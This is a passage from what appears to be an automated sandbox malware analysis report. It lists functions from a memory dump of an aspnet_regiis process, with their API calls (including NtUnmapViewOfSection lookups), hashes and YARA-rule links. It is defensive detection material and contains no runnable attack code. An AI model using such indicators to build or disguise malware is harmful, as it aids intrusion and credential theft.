                                                                                                                            • Opcode ID: 6b50651461a1bba4e9ea3c90cbc3a3b725747cc3e47f45871df45a9f28ec3bb5
                                                                                                                            • Instruction ID: ce547033b0e5bdb217513eb362da5459c9f19ce264a535c4086789b3a2fc7ad3
                                                                                                                            • Opcode Fuzzy Hash: 6b50651461a1bba4e9ea3c90cbc3a3b725747cc3e47f45871df45a9f28ec3bb5
                                                                                                                            • Instruction Fuzzy Hash: 0C21C532B025029BCB148BEAD85CE5A3B75EBC6368B044529F40597F80FB71A8529BA5
                                                                                                                            Function 6CC8A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF770,-00000001,?,6CC9E330,?,6CC4BDF7), ref: 6CC8A7AF
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC4BDF7), ref: 6CC8A7C2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000018,?,6CC4BDF7), ref: 6CC8A7E4
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF770), ref: 6CC8A80A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                            • String ID: accelerator.dll
                                                                                                                            • API String ID: 2442272132-2426294810
                                                                                                                            • Opcode ID: 0d756037242ee56d273e33fd10ed12a13e08e5dc8e1489ba3c2b8ca5f0eb877e
                                                                                                                            • Instruction ID: aa4d9e63797630e5a9ca29ab3fdf7a2df9d5db3a907044ece146d908e7d49a0c
                                                                                                                            • Opcode Fuzzy Hash: 0d756037242ee56d273e33fd10ed12a13e08e5dc8e1489ba3c2b8ca5f0eb877e
                                                                                                                            • Instruction Fuzzy Hash: A50162716113049FDF04CF96E888D6A7BB8FF89355705806AE909CB751EB709800CBA1
                                                                                                                            Function 6CC8C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC8C0E9), ref: 6CC8C418
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC8C437
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC8C0E9), ref: 6CC8C44C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                            • API String ID: 145871493-2623246514
                                                                                                                            • Opcode ID: 21b595702df03e96f180f326cf26df4083d14b2822de9e5aafd5cf762985eedd
                                                                                                                            • Instruction ID: 1c09b1ba33dc5c0a4bd1d29e41b76950e9d03a011f50660b35c79565c91843e4
                                                                                                                            • Opcode Fuzzy Hash: 21b595702df03e96f180f326cf26df4083d14b2822de9e5aafd5cf762985eedd
                                                                                                                            • Instruction Fuzzy Hash: 2CE0B6706013059FDF047FF1E92C71ABFF8A747708F004216AA0493A40FBB0C4418B50
                                                                                                                            Function 6CC875B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC8748B,?), ref: 6CC875B8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC875D7
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC8748B,?), ref: 6CC875EC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                            • API String ID: 145871493-3641475894
                                                                                                                            • Opcode ID: 95feedd76fd3b22c1c4f39bba439fabf9597ed6b1f956b98c66bb3f4f85d76a0
                                                                                                                            • Instruction ID: 522fa3d42b9cae0b0aed93299d1a5bfa897e84f48650ab656ae59060176facbc
                                                                                                                            • Opcode Fuzzy Hash: 95feedd76fd3b22c1c4f39bba439fabf9597ed6b1f956b98c66bb3f4f85d76a0
                                                                                                                            • Instruction Fuzzy Hash: 35E0927570130AAFEB006BE2E86C74ABEF8EB06358F105125EA05D3640FBB084829F10
                                                                                                                            Function 6CC87600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC87592), ref: 6CC87608
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC87627
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC87592), ref: 6CC8763C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 145871493-1050664331
                                                                                                                            • Opcode ID: 51575e913f76a0b460c9ca1b00fdde23e866954d9f61151429b1deffb16ef1b3
                                                                                                                            • Instruction ID: 0b084d2e7f2f4ccae42b9cd4d15dddf4c12a63b153d33cc4d9560a215ea09465
                                                                                                                            • Opcode Fuzzy Hash: 51575e913f76a0b460c9ca1b00fdde23e866954d9f61151429b1deffb16ef1b3
                                                                                                                            • Instruction Fuzzy Hash: C1E092B0601306AFDF006BE6A81C71ABEB8E71A399F008115E905D3740FBB084119B14
                                                                                                                            Function 6CC8BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,?,6CC8BE49), ref: 6CC8BEC4
                                                                                                                            • RtlCaptureStackBackTrace.NTDLL ref: 6CC8BEDE
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC8BE49), ref: 6CC8BF38
                                                                                                                            • RtlReAllocateHeap.NTDLL ref: 6CC8BF83
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC8BFA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2764315370-0
                                                                                                                            • Opcode ID: feac1ccb0a69278124715e75cb0fa16a8fd6617d76861e08149b39642eb05c51
                                                                                                                            • Instruction ID: 7501ed4f779521e9dbdd306eb97ee8f5daf94975cc6043339959dddea3638456
                                                                                                                            • Opcode Fuzzy Hash: feac1ccb0a69278124715e75cb0fa16a8fd6617d76861e08149b39642eb05c51
                                                                                                                            • Instruction Fuzzy Hash: 8D519175A012058FE710CF69CD90BABBBA2FF84318F294639D515A7B95E730F906CB80
                                                                                                                            Function 6CC78E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78E6E
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78EBF
                                                                                                                            • free.MOZGLUE(?,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F24
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?,6CC9D734), ref: 6CC78F46
                                                                                                                            • free.MOZGLUE(?,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F7A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC6B58D,?,?,?,?,?,?,?,6CC9D734,?,?,?), ref: 6CC78F8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: d12e2490d9321b9978c94d0b62e9a89bd07d6cee76732c6604dc29d2c3a595f3
                                                                                                                            • Instruction ID: e424b40342d177f1f09f2096ef442c3c56d839177d025ad6827b04c618230ceb
                                                                                                                            • Opcode Fuzzy Hash: d12e2490d9321b9978c94d0b62e9a89bd07d6cee76732c6604dc29d2c3a595f3
                                                                                                                            • Instruction Fuzzy Hash: E75180B5A012168FEB24CF58D880B6E73B2FB45318F15452AD616BB740F731F905CBA1
                                                                                                                            Function 6CC727E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7284D
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7289A
                                                                                                                            • free.MOZGLUE(?,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC728F1
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC72910
                                                                                                                            • free.MOZGLUE(00000001,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7293C
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC72620,?,?,?,6CC660AA,6CC65FCB,6CC679A3), ref: 6CC7294E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 1b27efe8af8581755195061e59b8499719da07b92de26bbf0e623092cd96ca0c
                                                                                                                            • Instruction ID: a0e08c1253e1860f5e97b415e0a6bab5bbaf2b01142ab3bd2b41f1b0e6bf167b
                                                                                                                            • Opcode Fuzzy Hash: 1b27efe8af8581755195061e59b8499719da07b92de26bbf0e623092cd96ca0c
                                                                                                                            • Instruction Fuzzy Hash: 76417FB1A00206CFEB24CF68D89876A77F6EB45308F294939D556EB740F732E905CB61
                                                                                                                            Function 6CC2CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC2D06C
                                                                                                                            • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC2D139
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            • API String ID: 1090480015-2608361144
                                                                                                                            • Opcode ID: 0576ac87ce2dee9607822235bace84e4527e5f95db1d58f43425e106140b7086
                                                                                                                            • Instruction ID: db0239b35a8789a704837528a6682035be44be6cea4fd21582d9214412881534
                                                                                                                            • Opcode Fuzzy Hash: 0576ac87ce2dee9607822235bace84e4527e5f95db1d58f43425e106140b7086
                                                                                                                            • Instruction Fuzzy Hash: 0941AD72B0122A4FDB048EBC9C987AE76B0EF59714F24023DE919E7784E7A59C118BC4
                                                                                                                            Function 6CC24DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC24EE9
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC24F02
                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC24F1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 713647276-0
                                                                                                                            • Opcode ID: 5418d749d536f45e4b153e70f3bfb86b0d5c6556b8ad5b2bb2762b66d28ea5e4
                                                                                                                            • Instruction ID: 5dd800d60b0473e5b0bb75565f95f740ceac243d3226a60ca546e54c3ce143b3
                                                                                                                            • Opcode Fuzzy Hash: 5418d749d536f45e4b153e70f3bfb86b0d5c6556b8ad5b2bb2762b66d28ea5e4
                                                                                                                            • Instruction Fuzzy Hash: B041DD716087019FC711CF29C88095BFBE4BF89354F108A2DF86A87B41EB38E918CB91
                                                                                                                            Function 6CC31530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC3159C
                                                                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC315BC
                                                                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC315E7
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC31606
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC3152B,?,?,?,?,6CC31248,?), ref: 6CC31637
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 733145618-0
                                                                                                                            • Opcode ID: bbacfb09bdb8bbbd2f6b64136411cb2b9602f257a05e41ac5ae97e7f8a19d6ff
                                                                                                                            • Instruction ID: d8453eb037ebf40330b23a1f610d6c2f1e191cf9b6e966ddbd9851067310c5c5
                                                                                                                            • Opcode Fuzzy Hash: bbacfb09bdb8bbbd2f6b64136411cb2b9602f257a05e41ac5ae97e7f8a19d6ff
                                                                                                                            • Instruction Fuzzy Hash: 1631C772A005248FC7148F6DE8504AE76B9FB853747241B2DE42BDBBD4FB30D90587A1
                                                                                                                            Function 6CC8AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AD9D
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8ADAC
                                                                                                                            • free.MOZGLUE(?,?,?,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE01
                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE1D
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CC9E330,?,6CC4C059), ref: 6CC8AE3D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3161513745-0
                                                                                                                            • Opcode ID: c871773255243bf3dd1aacc9d58e3146efe59f064713217a28b2b88ff078a98f
                                                                                                                            • Instruction ID: f2e6db6b47c668a90793021b207ddf58b0189d5208c93d998618ba5ca0df8759
                                                                                                                            • Opcode Fuzzy Hash: c871773255243bf3dd1aacc9d58e3146efe59f064713217a28b2b88ff078a98f
                                                                                                                            • Instruction Fuzzy Hash: 223141B1A012159FDB10DF769C44AABBBF8EF88714F158829E84AE7740F7349814CBA0
                                                                                                                            Function 6CC85EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CC9DCA0,?,?,?,6CC5E8B5,00000000), ref: 6CC85F1F
                                                                                                                            • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC5E8B5,00000000), ref: 6CC85F4B
                                                                                                                            • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC5E8B5,00000000), ref: 6CC85F7B
                                                                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC5E8B5,00000000), ref: 6CC85F9F
                                                                                                                            • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC5E8B5,00000000), ref: 6CC85FD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1389714915-0
                                                                                                                            • Opcode ID: 4bf7cf7c35cf5d45e0f4568a35762c9cf265f6b77da16f49728eefce86a19f36
                                                                                                                            • Instruction ID: c589fc615889f37b30bbacbc9b886fe7135dac8c6a0b26dffd4dc4ba7800851e
                                                                                                                            • Opcode Fuzzy Hash: 4bf7cf7c35cf5d45e0f4568a35762c9cf265f6b77da16f49728eefce86a19f36
                                                                                                                            • Instruction Fuzzy Hash: 8C312A343016048FE710CF69C898E2ABBF9FF89319B648598E5578BB95DB71EC41CB80
                                                                                                                            Function 6CC2B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC2B532
                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC2B55B
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC2B56B
                                                                                                                            • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC2B57E
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC2B58F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                            • String ID:
